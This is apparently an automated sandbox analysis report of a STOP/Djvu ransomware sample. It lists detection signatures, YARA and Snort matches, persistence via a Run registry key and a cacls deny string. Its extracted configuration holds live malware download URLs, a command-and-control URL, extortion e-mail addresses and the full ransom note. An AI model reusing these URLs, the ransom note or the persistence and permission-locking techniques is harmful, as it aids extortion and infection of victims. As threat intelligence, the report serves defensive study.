Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe

Overview

General Information

Sample name:c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
Analysis ID:1390473
MD5:1aab5a9252e93871932cd7381693e199
SHA1:3b1ee795bc70733d1820a48d2ee4e2641b124ce1
SHA256:88968c3b8e6e3fce9e327cb0d92079b88a35962f0503edc0888d2d9883de87c6
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
C2 URLs / IPs found in malware configuration
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-OQnsJqCOOl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0734SwOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIkf6D3VPGtiABEC052HyrDbXophP7h+k\\\\nIOz0jtwFVvDc7r1gIAxAWPb4o2Fk47gJ3fxHLdJGcD6ITWvE04U\\/gybzgIY17AaE\\\\ndJzscVm3\\/TVhquTHfkmleHfH4lem7WBr+yAvsK9v2lTqABxYQs+HlakgFplsaaqv\\\\nqNvuh1QyTIPfXyqLyKtxf8xaSm+fsjLIzzBijqKIPl5LN3RQv1KbB\\/SXOgajs9J1\\\\nEGLIPKChAFu18rMsSGvhBzHldvq7HuocsesAMvzaBqgUULa6B\\/IFOmv\\/3VJo0NYz\\\\nLQIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xfe888:$x1: C:\SystemID\PersonalID.txt
    • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0xfecec:$s1: " --AutoStart
    • 0xfed00:$s1: " --AutoStart
    • 0x102948:$s2: --ForNetRes
    • 0x102910:$s3: --Admin
    • 0x102d90:$s4: %username%
    • 0x102eb4:$s5: ?pid=
    • 0x102ec0:$s6: &first=true
    • 0x102ed8:$s6: &first=false
    • 0xfedf4:$s7: delself.bat
    • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xfe888:$x1: C:\SystemID\PersonalID.txt
      • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfecec:$s1: " --AutoStart
      • 0xfed00:$s1: " --AutoStart
      • 0x102948:$s2: --ForNetRes
      • 0x102910:$s3: --Admin
      • 0x102d90:$s4: %username%
      • 0x102eb4:$s5: ?pid=
      • 0x102ec0:$s6: &first=true
      • 0x102ed8:$s6: &first=false
      • 0xfedf4:$s7: delself.bat
      • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x39b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        00000003.00000000.1661461662.0000000000F01000.00000020.00000001.01000000.00000007.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        00000000.00000000.1623898320.0000000000F11000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        Click to see the 39 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
          • 0xfe888:$x1: C:\SystemID\PersonalID.txt
          • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
          • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
          • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
          • 0xfecec:$s1: " --AutoStart
          • 0xfed00:$s1: " --AutoStart
          • 0x102948:$s2: --ForNetRes
          • 0x102910:$s3: --Admin
          • 0x102d90:$s4: %username%
          • 0x102eb4:$s5: ?pid=
          • 0x102ec0:$s6: &first=true
          • 0x102ed8:$s6: &first=false
          • 0xfedf4:$s7: delself.bat
          • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
          • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
            6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
              Click to see the 25 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, ProcessId: 6828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper

              Snort Signatures

              Timestamp:192.168.2.4199.59.242.15049734802833438 02/12/24-01:36:15.166464
              SID:2833438
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.4199.59.242.15049732802020826 02/12/24-01:35:56.488809
              SID:2020826
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.4199.59.242.15049732802036333 02/12/24-01:35:56.488809
              SID:2036333
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://colisumy.com/dl/build2.exe$runURL Reputation: Label: malware
              Source: http://zexeq.com/files/1/build3.exe$runURL Reputation: Label: malware
              Source: http://zexeq.com/raud/get.phpURL Reputation: Label: malware
              Source: http://colisumy.com/dl/build2.exeURL Reputation: Label: malware
              Source: http://zexeq.com/raud/get.phpepURL Reputation: Label: malware
              Source: http://zexeq.com/files/1/build3.exeURL Reputation: Label: malware
              Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueAvira URL Cloud: Label: malware
              Source: http://zexeq.com/files/1/build3.exerunAvira URL Cloud: Label: malware
              Source: http://colisumy.com/dl/build2.exerunAvira URL Cloud: Label: malware
              Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true(Avira URL Cloud: Label: malware
              Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0Avira URL Cloud: Label: malware
              Source: http://zexeq.com/files/1/build3.exe$runW=Avira URL Cloud: Label: malware
              Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Avira URL Cloud: Label: malware
              Source: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637foAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeAvira: detection malicious, Label: HEUR/AGEN.1319085
              Found malware configuration
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-OQnsJqCOOl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0734SwOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wind
              Multi AV Scanner detection for domain / URL
              Source: zexeq.comVirustotal: Detection: 20%Perma Link
              Source: colisumy.comVirustotal: Detection: 19%Perma Link
              Source: http://colisumy.com/dl/build2.exerunVirustotal: Detection: 16%Perma Link
              Source: http://zexeq.com/files/1/build3.exerunVirustotal: Detection: 15%Perma Link
              Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0Virustotal: Detection: 15%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeReversingLabs: Detection: 86%
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeVirustotal: Detection: 78%Perma Link
              Multi AV Scanner detection for submitted file
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeReversingLabs: Detection: 86%
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeVirustotal: Detection: 78%Perma Link
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F21178 CryptDestroyHash,CryptReleaseContext,0_2_00F21178
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00F1E870
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00F1EAA0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1EA51 CryptDestroyHash,CryptReleaseContext,0_2_00F1EA51
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1EC68 CryptDestroyHash,CryptReleaseContext,0_2_00F1EC68
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F20FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,0_2_00F20FC0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_00F1E870
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_00F1EAA0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F20FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00F20FC0
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F21178 CryptDestroyHash,CryptReleaseContext,2_2_00F21178
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1EA51 CryptDestroyHash,CryptReleaseContext,2_2_00F1EA51
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1EC68 CryptDestroyHash,CryptReleaseContext,2_2_00F1EC68
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00F0E870
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00F0EAA0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F10FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,3_2_00F10FC0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F11178 CryptDestroyHash,CryptReleaseContext,3_2_00F11178
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0EA51 CryptDestroyHash,CryptReleaseContext,3_2_00F0EA51
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0EC68 CryptDestroyHash,CryptReleaseContext,3_2_00F0EC68
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F11178 CryptDestroyHash,CryptReleaseContext,4_2_00F11178
